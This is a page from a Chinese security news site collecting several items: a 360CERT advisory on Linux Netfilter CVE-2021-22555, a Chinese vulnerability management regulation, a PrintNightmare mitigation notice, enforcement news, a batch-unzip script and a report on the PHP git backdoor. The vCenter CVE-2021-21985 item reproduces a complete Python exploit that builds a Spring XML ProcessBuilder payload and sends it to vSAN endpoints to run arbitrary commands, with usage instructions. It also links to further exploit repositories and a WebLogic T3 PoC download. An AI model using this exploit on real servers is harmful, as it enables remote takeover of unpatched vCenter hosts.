微慑信息网

业界快讯 第6页

【PoC公开】CVE-2021-22555: Linux Netfilter本地权限提升漏洞通告

微慑管理员阅读(1592)

报告编号:B6-2021-071601

报告来源:360CERT

报告作者:360CERT

更新日期:2021-07-16

1
 漏洞简述
2021年07月16日,360CERT监测发现国外安全研究员@theflow公开了CVE-2021-22555 Linux Netfilter提权漏洞的分析报告,漏洞编号为CVE-2021-22555,漏洞等级:高危,漏洞评分:7.8

Linux Netfilter 模块是内核中用于管理网络数据包的一个软件框架,被人熟知的 iptables,nftables等工具均是基于 Netfilter 开发的。该漏洞利用 Netfilter 中 memcopy,memset函数的使用过程中的逻辑不当实现权限提升。

该漏洞在kCTF中被用于攻击kubernetes pod容器实现虚拟化逃逸。

对此,360CERT建议广大用户及时将Linux Kernel升级到最新版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。

2
 风险等级
360CERT对该漏洞的评定结果如下

评定方式 等级
威胁等级 高危
影响面 广泛
攻击者价值
利用难度
360CERT评分 7.8
3
 漏洞详情

CVE-2021-22555: linux kernel-netfilter 特权提升漏洞

CVE: CVE-2021-22555

组件: kernel-netfilter

漏洞类型: 特权提升

影响: 权限提升;服务器接管

简述: Linux 内核模块Netfilter中存在一处权限提升漏洞,在在64 位系统上为 32 位进程处理 setsockopt IPT_SO_SET_REPLACE(或 IP6T_SO_SET_REPLACE)时,如果内核选项CONFIG_USER_NS 、CONFIG_NET_NS被开启,则攻击者可以通过该漏洞实现权限提升,以及从docker、k8s容器中实施容器逃逸。

4
 影响版本
以下版本为hash内容的是 Linux Kernel 完成修复的 git commit

组件 影响版本 安全版本
Linux:kernel-netfilter <b29c457a6511435960115c0f548c4360d5f4801d b29c457a6511435960115c0f548c4360d5f4801d
debain:stretch 4.9.228-1 4.9.272-1
debain:buster 4.19.171-2 4.19.194-1
Linux:Kernel >=2.6.19 5.12,5.10.31, 5.4.113, 4.19.188, 4.14.231, 4.9.267, 4.4.267
5
 修复建议

通用修补建议

根据影响版本中的信息,排查并升级到安全版本

临时修补建议

根据 RedHat 的建议,用户可以实施以下操作通过禁用非特权用户执行CLONE_NEWUSERCLONE_NEWNET,以缓解该漏洞带来的影响

echo 0 > /proc/sys/user/max_user_namespaces
6
 产品侧解决方案
若想了解更多产品信息或有相关业务需求,可移步至http://360.net。

360安全分析响应平台

360安全大脑的安全分析响应平台通过网络流量检测、多传感器数据融合关联分析手段,对该类漏洞的利用进行实时检测和阻断,请用户联系相关产品区域负责人或(shaoyulong#360.cn)获取对应产品。

【PoC公开】CVE-2021-22555: Linux Netfilter本地权限提升漏洞通告

360本地安全大脑

360本地安全大脑是将360云端安全大脑核心能力本地化部署的一套开放式全场景安全运营平台,实现安全态势、监控、分析、溯源、研判、响应、管理的智能化安全运营赋能。360本地安全大脑已支持对相关漏洞利用的检测,请及时更新网络神经元(探针)规则和本地安全大脑关联分析规则,做好防护。

 

360终端安全管理系统

360终端安全管理系统软件是在360安全大脑极智赋能下,以大数据、云计算等新技术为支撑,以可靠服务为保障,集防病毒与终端安全管控功能于一体的企业级安全产品。

360终端安全管理系统已支持对相关漏洞进行检测和修复,建议用户及时更新漏洞库并安装更新相关补丁。

 

7
 时间线
2021-07-16 theflow公开漏洞分析报告

2021-07-16 360CERT发布通告

8
 参考链接
1、 CVE-2021-22555: Turning x00x00 into 10000$

https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html#escaping-the-container-and-popping-a-root-shell

2、 RedHat: CVE-2021-22555

https://access.redhat.com/security/cve/CVE-2021-22555#cve-faq

3、 netfilter: x_tables: fix compat match/target pad out-of-bound write

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/x_tables.c?id=b29c457a6511435960115c0f548c4360d5f4801d

4、 Linux: Heap Out-Of-Bounds Write in xt_compat_target_from_user

https://github.com/google/security-research/security/advisories/GHSA-xxx5-8mvq-3528

9
 特制报告下载链接
一直以来,360CERT对全球重要网络安全事件进行快速通报、应急响应。为更好地为政企用户提供最新漏洞以及信息安全事件的安全通告服务,现360CERT正式推出安全通告特制版报告,以便用户做资料留存、传阅研究与查询验证。用户可直接通过以下链接进行特制报告的下载。

【PoC公开】CVE-2021-22555: Linux Netfilter本地权限提升漏洞通告

http://certdl.qihucdn.com/cert-public-file/buddha_alert/【360CERT】【PoC公开】CVE-2021-22555__Linux_Netfilter本地权限提升漏洞通告.pdf

若有订阅意向与定制需求请扫描下方二维码进行信息填写,或发送邮件至g-cert-report#360.cn ,并附上您的 公司名、姓名、手机号、地区、邮箱地址。

工信部、网信办、公安部联合印发《网络产品安全漏洞管理规定》

微慑管理员阅读(1623)

 

导 读

 

工业和信息化部、国家互联网信息办公室、公安部近日联合印发《网络产品安全漏洞管理规定》。《规定》旨在维护国家网络安全,保护网络产品和重要网络系统的安全稳定运行;规范漏洞发现、报告、修补和发布等行为,明确网络产品提供者、网络运营者,以及从事漏洞发现、收集、发布等活动的组织或个人等各类主体的责任和义务;鼓励各类主体发挥各自技术和机制优势开展漏洞发现、收集、发布等相关工作。《规定》自9月1日起施行。

 

关于印发网络产品安全漏洞管理规定的通知

工信部联网安〔2021〕66号

各省、自治区、直辖市及新疆生产建设兵团工业和信息化主管部门、网信办、公安厅(局),各省、自治区、直辖市通信管理局:
 
  现将《网络产品安全漏洞管理规定》予以发布,自2021年9月1日起施行。
 
工业和信息化部
国家互联网信息办公室
公安部
2021年7月12日
 
网络产品安全漏洞管理规定
 
  第一条 为了规范网络产品安全漏洞发现、报告、修补和发布等行为,防范网络安全风险,根据《中华人民共和国网络安全法》,制定本规定。
  第二条 中华人民共和国境内的网络产品(含硬件、软件)提供者和网络运营者,以及从事网络产品安全漏洞发现、收集、发布等活动的组织或者个人,应当遵守本规定。
  第三条 国家互联网信息办公室负责统筹协调网络产品安全漏洞管理工作。工业和信息化部负责网络产品安全漏洞综合管理,承担电信和互联网行业网络产品安全漏洞监督管理。公安部负责网络产品安全漏洞监督管理,依法打击利用网络产品安全漏洞实施的违法犯罪活动。
  有关主管部门加强跨部门协同配合,实现网络产品安全漏洞信息实时共享,对重大网络产品安全漏洞风险开展联合评估和处置。
  第四条 任何组织或者个人不得利用网络产品安全漏洞从事危害网络安全的活动,不得非法收集、出售、发布网络产品安全漏洞信息;明知他人利用网络产品安全漏洞从事危害网络安全的活动的,不得为其提供技术支持、广告推广、支付结算等帮助。
  第五条 网络产品提供者、网络运营者和网络产品安全漏洞收集平台应当建立健全网络产品安全漏洞信息接收渠道并保持畅通,留存网络产品安全漏洞信息接收日志不少于6个月。
  第六条 鼓励相关组织和个人向网络产品提供者通报其产品存在的安全漏洞。
  第七条 网络产品提供者应当履行下列网络产品安全漏洞管理义务,确保其产品安全漏洞得到及时修补和合理发布,并指导支持产品用户采取防范措施:
  (一)发现或者获知所提供网络产品存在安全漏洞后,应当立即采取措施并组织对安全漏洞进行验证,评估安全漏洞的危害程度和影响范围;对属于其上游产品或者组件存在的安全漏洞,应当立即通知相关产品提供者。
  (二)应当在2日内向工业和信息化部网络安全威胁和漏洞信息共享平台报送相关漏洞信息。报送内容应当包括存在网络产品安全漏洞的产品名称、型号、版本以及漏洞的技术特点、危害和影响范围等。
  (三)应当及时组织对网络产品安全漏洞进行修补,对于需要产品用户(含下游厂商)采取软件、固件升级等措施的,应当及时将网络产品安全漏洞风险及修补方式告知可能受影响的产品用户,并提供必要的技术支持。
  工业和信息化部网络安全威胁和漏洞信息共享平台同步向国家网络与信息安全信息通报中心、国家计算机网络应急技术处理协调中心通报相关漏洞信息。
  鼓励网络产品提供者建立所提供网络产品安全漏洞奖励机制,对发现并通报所提供网络产品安全漏洞的组织或者个人给予奖励。
  第八条 网络运营者发现或者获知其网络、信息系统及其设备存在安全漏洞后,应当立即采取措施,及时对安全漏洞进行验证并完成修补。
  第九条 从事网络产品安全漏洞发现、收集的组织或者个人通过网络平台、媒体、会议、竞赛等方式向社会发布网络产品安全漏洞信息的,应当遵循必要、真实、客观以及有利于防范网络安全风险的原则,并遵守以下规定:
  (一)不得在网络产品提供者提供网络产品安全漏洞修补措施之前发布漏洞信息;认为有必要提前发布的,应当与相关网络产品提供者共同评估协商,并向工业和信息化部、公安部报告,由工业和信息化部、公安部组织评估后进行发布。
  (二)不得发布网络运营者在用的网络、信息系统及其设备存在安全漏洞的细节情况。
  (三)不得刻意夸大网络产品安全漏洞的危害和风险,不得利用网络产品安全漏洞信息实施恶意炒作或者进行诈骗、敲诈勒索等违法犯罪活动。
  (四)不得发布或者提供专门用于利用网络产品安全漏洞从事危害网络安全活动的程序和工具。
  (五)在发布网络产品安全漏洞时,应当同步发布修补或者防范措施。
  (六)在国家举办重大活动期间,未经公安部同意,不得擅自发布网络产品安全漏洞信息。
  (七)不得将未公开的网络产品安全漏洞信息向网络产品提供者之外的境外组织或者个人提供。
  (八)法律法规的其他相关规定。
  第十条 任何组织或者个人设立的网络产品安全漏洞收集平台,应当向工业和信息化部备案。工业和信息化部及时向公安部、国家互联网信息办公室通报相关漏洞收集平台,并对通过备案的漏洞收集平台予以公布。
  鼓励发现网络产品安全漏洞的组织或者个人向工业和信息化部网络安全威胁和漏洞信息共享平台、国家网络与信息安全信息通报中心漏洞平台、国家计算机网络应急技术处理协调中心漏洞平台、中国信息安全测评中心漏洞库报送网络产品安全漏洞信息。
  第十一条 从事网络产品安全漏洞发现、收集的组织应当加强内部管理,采取措施防范网络产品安全漏洞信息泄露和违规发布。
  第十二条 网络产品提供者未按本规定采取网络产品安全漏洞补救或者报告措施的,由工业和信息化部、公安部依据各自职责依法处理;构成《中华人民共和国网络安全法》第六十条规定情形的,依照该规定予以处罚。
  第十三条 网络运营者未按本规定采取网络产品安全漏洞修补或者防范措施的,由有关主管部门依法处理;构成《中华人民共和国网络安全法》第五十九条规定情形的,依照该规定予以处罚。
  第十四条 违反本规定收集、发布网络产品安全漏洞信息的,由工业和信息化部、公安部依据各自职责依法处理;构成《中华人民共和国网络安全法》第六十二条规定情形的,依照该规定予以处罚。
  第十五条 利用网络产品安全漏洞从事危害网络安全活动,或者为他人利用网络产品安全漏洞从事危害网络安全的活动提供技术支持的,由公安机关依法处理;构成《中华人民共和国网络安全法》第六十三条规定情形的,依照该规定予以处罚;构成犯罪的,依法追究刑事责任。
  第十六条 本规定自2021年9月1日起施行。

 


来源:工业和信息化部网络安全管理局

 

原文始发于微信公众号(工信微报):工信部、网信办、公安部联合印发《网络产品安全漏洞管理规定》

Windows 打印服务0Day漏洞风险通告(CVE-2021-34527),请尽早防御

微慑管理员阅读(1807)

2021年7月1日,微软提前发布Windows Print Spooler 远程代码执行漏洞(CVE-2021-34527)。此漏洞与分配为 CVE-2021-1675 的漏洞相似但不同,后者解决了 RpcAddPrinterDriverEx() 中的不同漏洞。攻击向量也不同。CVE-2021-1675 已由 2021 年 6 月的安全更新解决。

漏洞概述:

Microsoft 已发现并调查影响 Windows Print Spooler 的远程代码执行漏洞,并已将 CVE-2021-34527 分配给此漏洞。

当 Windows Print Spooler 服务不正确地执行特权文件操作时,存在远程执行代码漏洞风险。成功利用此漏洞的攻击者可以使用 SYSTEM 权限运行任意代码。然后攻击者可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。

攻击必须涉及调用 RpcAddPrinterDriverEx() 的经过身份验证的用户。

漏洞等级:严重

漏洞编号:CVE-2021-34527

受影响的版本:

包含该漏洞的代码存在于所有版本的 Windows 中,微软仍在调查是否所有版本都可以利用。

漏洞利用情况:

目前微软公告显示,该漏洞已公开披露,疑似已检测到在野利用,漏洞POC(概念验证代码)已公开。

漏洞解决办法:

微软公司给出了针对该漏洞的缓解办法,目前正式补丁尚未发布。

确定 Print Spooler 服务是否正在运行(以域管理员身份运行)

以域管理员身份运行以下命令:

Get-Service -Name Spooler

如果 Print Spooler 正在运行或该服务未设置为禁用,请选择以下选项之一以禁用 Print Spooler 服务,或通过组策略禁用入站远程打印:

选项 1 – 禁用 Print Spooler 服务

如果禁用 Print Spooler 服务适合您的企业,请使用以下 PowerShell 命令:

Stop-Service -Name Spooler -Force

Set-Service -Name Spooler -StartupType Disabled

禁用 Print Spooler 服务会禁用本地和远程打印功能。

选项 2 – 通过组策略禁用入站远程打印

运行组策略编辑器(Win+R,输入gpedit.msc,打开组策略编辑器),依次浏览到:计算机配置/管理模板/打印机

禁用“允许打印后台处理程序接受客户端连接:”策略以阻止远程攻击。

变通办法的影响:

此策略将通过阻止入站远程打印操作来阻止远程攻击。该系统将不再用作打印服务器,但仍然可以本地打印到直接连接的设备。

参考链接:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

多家平台企业被启动网络安全审查,均于六月在美上市

微慑管理员阅读(2016)

多家平台企业被启动网络安全审查,均于六月在美上市

导读

2021年7月2日晚,网络安全审查办公室发布公告称,依据《国家安全法》《网络安全法》,该办公室按照《网络安全审查办法》,对“滴滴出行”实施网络安全审查,审查期间“滴滴出行”停止新用户注册。7月4日,国家网信办发布通告称,根据举报,经检测核实,“滴滴出行”App存在严重违法违规收集使用个人信息问题,依据《网安法》相关规定,通知应用商店下架“滴滴出行”App,并要求滴滴公司依法整改。

 

7月5日,网络安全审查办公室再次发布公告称,依法对“运满满”“货车帮”“BOSS直聘”实施网络安全审查,审查期间停止APP新用户注册。

 

据悉,以上被列入网络安全审查的企业均为六月赴美上市的互联网公司。其中,滴滴出行于6月30日在美国纽交所上市,“运满满”、“货车帮”隶属的满帮集团于6月22日在美国纽交所上市,BOSS直聘则于6月11日在美国纳斯达克上市。

 

对于受到审查一事,滴滴、满帮及BOSS直聘均回应称将积极配合审查工作,排查相关风险。

 

导读系本公众号原创,转载请注明文字出自本公众号。

多家平台企业被启动网络安全审查,均于六月在美上市

多家平台企业被启动网络安全审查,均于六月在美上市

多家平台企业被启动网络安全审查,均于六月在美上市

多家平台企业被启动网络安全审查,均于六月在美上市

BOSS直聘回应称,高度重视并将积极配合网络安全审查工作,全面排查和防范网络安全风险。在有关部门的监督领导下,BOSS直聘一直坚决维护网络安全,全力保障各项数据安全。我们将不断提升网络安全意识与能力,切实履行企业的责任和义务。 

满帮集团回应称,积极配合审查工作,一如既往地接受监管部门的指导与监督。 满帮集团还表示,在审查期间,将对于集团的网络安全进行全面梳理和排查,进一步完善自身的网络安全体系和技术能力。坚决维护国家安全,保障公共利益。

本文源自:综合报道。

 

原文始发于微信公众号(个人信息与数据保护实务评论):多家平台企业被启动网络安全审查,均于六月在美上市

vCenter server漏洞(VMSA-2021-0010、CVE-2021-21985、CVE-2021-21986)EXP

微慑管理员阅读(2265)

VMware于2021年5月25日发布安全公告VMSA-2021-0010,其中包含了与vSphere Client (HTML5)相关的漏洞,分别为CVE-2021-21985和CVE-2021-21986。

详细信息请参考:https://www.vmware.com/security/advisories/VMSA-2021-0010.html

CVE描述:

由于Virtual SAN运行状况检查插件中缺少输入验证,因此vSphere Client(HTML5)包含一个远程执行代码漏洞,默认情况下,该插件已在vCenter Server中启用。

VMware已评估此问题的严重性在严重严重性范围内,最大CVSSv3基本得分为9.8。

已知攻击:

具有网络访问端口443的恶意行为者可能会利用此问题在托管vCenter Server的基础操作系统上以不受限制的特权执行命令。

即使组织没有在外部公开vCenter Server,一旦进入网络,攻击者仍然可以利用此漏洞。在通过其他方式(例如,鱼叉式网络钓鱼)获得对网络的访问权限之后,VMware特别呼吁勒索软件团体非常善于利用此类漏洞(例如,这种后危害)。

影响范围:

无论是否使用vSAN,默认情况下,所有vCenter Server部署中都会启用受影响的Virtual SAN运行状况检查插件。

vCenter 7.0 U2b (17958471)之前的所有版本;

vCenter 6.7 U3n(18010531)之前的所有版本;

vCenter 6.5U3p(17994927)之前的所有版本;

EXP:


https://github.com/r0ckysec/CVE-2021-21985

https://github.com/xnianq/cve-2021-21985_exp


#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import base64
import sys
import zipfile
from urllib.parse import urlparse

import zlib
import json
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def banner():
    print("""
==============================================================
         _____           _              _____   _____ ______ 
        / ____|         | |            |  __ \ / ____|  ____|
 __   _| |     ___ _ __ | |_ ___ _ __  | |__) | |    | |__   
 \ \ / / |    / _ \ '_ \| __/ _ \ '__| |  _  /| |    |  __|  
  \ V /| |___|  __/ | | | ||  __/ |    | | \ \| |____| |____ 
   \_/  \_____\___|_| |_|\__\___|_|    |_|  \_\\_____|______|
                                                             
                              Powered by r0cky Team ZionLab
==============================================================
    """)



def create_xml():

    print("[*] Create Xml to offline_bundle.xml ...")
    context = """<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
          <list>
            <value>/bin/bash</value>
            <value>-c</value>
            <value><![CDATA[ {cmd} 2>&1 ]]></value>
          </list>
        </constructor-arg>
    </bean>
    <bean id="is" class="java.io.InputStreamReader">
        <constructor-arg>
            <value>#{pb.start().getInputStream()}</value>
        </constructor-arg>
    </bean>
    <bean id="br" class="java.io.BufferedReader">
        <constructor-arg>
            <value>#{is}</value>
        </constructor-arg>
    </bean>
    <bean id="collectors" class="java.util.stream.Collectors"></bean>
    <bean id="system" class="java.lang.System">
        <property name="whatever" value="#{ system.setProperty(&quot;output&quot;, br.lines().collect(collectors.joining(&quot;\n&quot;))) }"/>
    </bean>
</beans>
""".replace("{cmd}", cmd)
    with open('offline_bundle.xml', 'w') as wf:
        wf.write(context)
        wf.flush()

def create_zip():
    print("[*] Create Zip to offline_bundle.zip ...")
    with zipfile.ZipFile('offline_bundle.zip', 'w', zipfile.ZIP_DEFLATED) as zp:
        zp.write('offline_bundle.xml')

def toBase64():
    with open('offline_bundle.zip', 'rb') as rf:
        return base64.b64encode(rf.read())

def poc1(url):
    ssrf_str = "https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,{}%23"
    ssrf = ssrf_str.format(bytes.decode(toBase64()))

    print ("[*] Get XML to SystemProperties  ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"

    data = {"methodInput":[[ssrf]]}

    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False)


def poc2(url):

    print("[*] getProperty   ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"

    data = {"methodInput": ["output", None]}

    r = requests.post(target, data=json.dumps(data), headers=headers,
                      verify=False)
    if "result" in r.json():
        print("[+] Command:", cmd)
        print(r.json()['result'])
    else:
        print ("[-] send payload failed.")

headers = {"Content-Type": "application/json"}

def main(url):
    try:
        create_xml()
        create_zip()
        poc1(url)
        poc2(url)
    except:
        print("[-] send payload failed.")

if __name__ == '__main__':
    banner()
    try:
        target = sys.argv[1]
        cmd = sys.argv[2]
        up = urlparse(target)
        target = up.scheme + "://" + up.netloc
        main(target)
    except:
        print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")

 

 

windows目录下所有压缩文件批量解压脚本

微慑管理员阅读(1659)

 

 

@echo off
set WinRAR="C:\Program Files\WinRAR\WinRAR.exe"
for /r . %%a in (*.rar *.zip) do (
cd "%%~pa"
%WinRAR% x "%%a"
del "%%a"
)

 

 

 

@echo off
set WinRAR="C:\Program Files\WinRAR\WinRAR.exe"
for /r . %%a in (*.rar *.zip) do (
cd "%%~pa"
%WinRAR% x -ad -y "%%a"
del "%%a"
)

转载【https://blog.csdn.net/hahohehehe/article/details/103393802】

 

 

网络安全大检查,3家企业被要求整改

微慑管理员阅读(1873)

网络安全大检查,3家企业被要求整改

文章来源丨四川新闻网

为切实加强互联网安全管理工作,消除网络安全隐患,落实网络安全措施,确保不发生重大网络安全事故,5月12日,四川省华蓥市公安局网安大队对辖区3家电信业务运营商开展网络安全监督检查工作。


网络安全大检查,3家企业被要求整改
在检查过程中,民警开展了网络安全实地检查、网络安全技术检测、督促整改网络安全漏洞隐患、加强网络安全行政执法等检查工作。民警采取询问情况、查阅核对材料、检查系统平台安全问题等方式对企业运维情况开展检查,认真查阅企业网络安全相关文件、网络安全内部管理制度、机房运行维护制度、网络安全事件应急预案等资料,同时对运营商主要负责人宣传目前网络安全形势及网络安全相关法律法规、详细讲解《网络安全法》部分条款,提升企业对网络安全的认识高度和重视程度。


网络安全大检查,3家企业被要求整改
在此次检查中,民警发现辖区电信业务运营商均存在网络安全相关规章制度不够健全、单位相关人员网络安全意识不够高的问题。针对查出的问题,已对3家企业各下发限期整改通知书1份,要求其限期整改到位,确保安全隐患清零,提高我市公共通信和信息服务行业网络安全防护能力。

☆ END ☆

联系/合作/投稿邮箱:[email protected]


网络安全大检查,3家企业被要求整改

网络安全大检查,3家企业被要求整改
你点的每个赞,我都认真当成了喜欢

原文始发于微信公众号(安全365):网络安全大检查,3家企业被要求整改

银川一家公司未做任何网络防护,收到网安大队罚单!

微慑管理员阅读(1466)

 

 

2021年4月8日19时许,银川市金凤区发生了一起黑客攻击事件,银川某科技有限公司报警称,公司的服务器被人恶意攻击导致无法正常使用。

 

接警后,金凤区公安分局网络安全大队迅速组织警力赶往了现场了解情况。

 

据银川某科技有限公司工作人员介绍,他们发现在当天下午自己企业的网站登录不上了,随后整个办公系统瘫痪,工作无法正常进行。

 

 

民警通过检测分析发现,该公司将服务器暴露在互联网,未使用安全设备进行基本安全防护、操作系统未安装杀毒软件,导致其公司服务器被黑客入侵、攻击。但由于该公司未部署日志服务器、审计服务器等,无法对系统日志合理保存,导致无法对攻击者进行溯源侦查。

 

警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

 

随后金凤区公安分局网安大队根据《网络安全法》的相关规定,对银川某科技有限公司未落实网络安全等级保护制度、未履行网络安全保护义务的行为,给予了相应的处罚。

警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

“对企业的服务器进行了扫描,告诉企业技术人员有哪些漏洞需要补,也给他们下了报告,对他们进行了警告的行政处罚,并要求责令改正,让他们加强网络安全防护。”金凤区公安分局网安大队民警王芮说。

 

针对此事
民警也提醒企业
一定要提高安全意识
增强防范和抵御网络安全风险能力
进一步加强服务器等重要数据的保护
从源头遏制网络犯罪

 

银川市新闻传媒集团全媒体记者 | 马鑫 刘文光

实习生 | 马志伟

通讯员 | 张楠

编辑 | 小金鱼

警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

 

原文始发于微信公众号(直播银川):警钟 || 银川一家公司未做任何网络防护,收到网安大队罚单!

[附PoC]weblogic的T3反序列化0day-python EXP脚本

微慑管理员阅读(3076)

漏洞

1.weblogic T3 漏洞检测脚本 python2 .py url 7001

2.某天安全检测 越权访问漏洞

自取:链接: https://pan.baidu.com/s/1HE9xAjTRlizBxoaFNx6gYw 提取码: 26bh

weblogic的T3反序列化0day-python脚本

weblogic的T3反序列化0day-python脚本

weblogic的T3反序列化0day-python脚本

weblogic的T3反序列化0day-python脚本

weblogic的T3反序列化0day-python脚本

解决方案

  1. 这个反序列化漏洞并不只是影响jdk7u21,因为我们知道8u21是7u21的变种,理论上将jdk 8u21以下的jdk都受到此反序列化gadget的影响。
  2. 直接关闭iiop/t3这两个协议

 

 

如有侵权,请联系删除

原文始发于微信公众号(黑云信息安全):weblogic的T3反序列化0day-python脚本

PHP的Git服务器被黑客入侵,源代码被插入后门代码

微慑管理员阅读(2055)

PHP的Git服务器被黑客入侵,源代码被插入后门代码


2021年3月28日,有身份不明人士入侵了PHP编程语言的官方Git服务器http://git.php.net,并上传了未经授权的更新包,而包中源代码被插入了秘密后门代码。

 

这两个恶意提交被推送到git.php.net服务器上的自托管php-src存储库中,使用的是编程语言的作者Rasmus Lerdorf和Microsoft的软件开发人员Nikita Popov的名字Jetbrains。

PHP的Git服务器被黑客入侵,源代码被插入后门代码

PHP方面发布紧急公告指出:

2021-03-28,两个恶意代码分支提交到了php-src repo上,使用的是内部人员的名字,目前内部不知道是如何发生,但是一切都指向了git.php.net服务器可能被入侵的情况。

尽管目前正在调查,但是为了确保安全,我们已经停止了git.php.net服务器,之后会跳转到Github上的镜像存储库中。

PHP的Git服务器被黑客入侵,源代码被插入后门代码

被插入代码地址,实现的功能很显然了。
https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d

PHP的Git服务器被黑客入侵,源代码被插入后门代码

https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a

PHP的Git服务器被黑客入侵,源代码被插入后门代码

 

黑鸟在代码中发现含有Zerodium的字符,Zerodium是一个著名的0day漏洞经纪人,这里的字符串很有可能是攻击者为了嫁祸给Zerodium。

 

PHP的Git服务器被黑客入侵,源代码被插入后门代码

目前安全社区认为,攻击的手段可能是这个:

 

在2021年2月,有研究人员就发布了一种新颖的供应链攻击,安全研究人员设法破坏了超过35家主要公司的内部系统,包括Microsoft,Apple,PayPal,Shopify,Netflix,Yelp,Tesla和Uber的内部系统,并实现了远程代码执行。

 

该技术称为依赖混淆(dependency confusion) 或替代攻击,它利用一个软件可能包含来自私有和公共来源的混合依赖库。

PHP的Git服务器被黑客入侵,源代码被插入后门代码

简单来说,就是攻击者首先通过收集大量这些公司的一些私有库(很多是由于github的代码或者js中的代码泄露导致),也就是一些内部会使用的库的名称,而这些库一般是不会传到公有库里面去的,例如pypI、npm。

 

而这时候,攻击者将恶意代码库命名为私有库名称,并将其伪造成最新的私有库模块上传到公有库中,而有的公司的代码中可能存在错误的更新配置,导致客户端会自动从公有库中下载伪造的“最新”版本而无需要求开发人员采取任何措施,这样在调用库的时候就直接中招了。(仅举例说明,详细请参考链接)

 

作者采取了DNS传输的方法将数据从受害者的电脑传输到其设备中。

PHP的Git服务器被黑客入侵,源代码被插入后门代码

当然以上都是其他的技术,具体PHP的Git服务器如何被入侵还需要等待详细调查。

如果有定期更新PHP源代码习惯的同学记得检查一二,防止被供应链攻击。

参考链接:

https://news-web.php.net/php.internals/113838

https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

PHP的Git服务器被黑客入侵,源代码被插入后门代码

原文始发于微信公众号(黑鸟):PHP的Git服务器被黑客入侵,源代码被插入后门代码

微慑信息网 专注工匠精神

微慑信息网-VulSee.com-关注前沿安全态势,聚合网络安全漏洞信息,分享安全文档案例

访问我们联系我们

登录

找回密码

注册